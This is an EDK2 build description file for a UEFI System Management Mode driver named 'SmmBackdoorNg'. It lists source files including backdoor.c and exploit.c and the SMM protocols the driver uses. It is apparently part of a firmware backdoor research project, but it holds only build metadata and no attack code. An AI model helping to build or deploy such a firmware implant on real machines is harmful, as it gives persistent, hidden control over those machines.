[defines]
  INF_VERSION = 0x00010005 
  BASE_NAME = SmmBackdoorNg
  FILE_GUID = 21D5AE41-147E-4C44-AE72-ECD9BBB454D4
  MODULE_TYPE = DXE_SMM_DRIVER

[Sources]
  src/debug.c
  src/loader.c
  src/printf.c
  src/backdoor.c
  src/exploit.c
  src/serial.c
  src/std.c
  src/virtmem.c

[Sources.X64]
  src/asm/amd64/common_asm.asm

[Packages]
  MdePkg/MdePkg.dec
  MdeModulePkg/MdeModulePkg.dec
  IntelFrameworkPkg/IntelFrameworkPkg.dec  
  IntelFrameworkModulePkg/IntelFrameworkModulePkg.dec  

[LibraryClasses]

[Protocols]
  gEfiSimpleTextOutProtocolGuid
  gEfiLoadedImageProtocolGuid
  gEfiDevicePathProtocolGuid
  gEfiSerialIoProtocolGuid  
  gEfiSmmAccess2ProtocolGuid
  gEfiSmmBase2ProtocolGuid
  gEfiSmmCommunicationProtocolGuid
  gEfiSmmCpuProtocolGuid
  gEfiSmmSwDispatch2ProtocolGuid
  gEfiSmmPeriodicTimerDispatch2ProtocolGuid

[Guids]
  gEfiEventDxeDispatchGuid
  
[Depex]
  TRUE
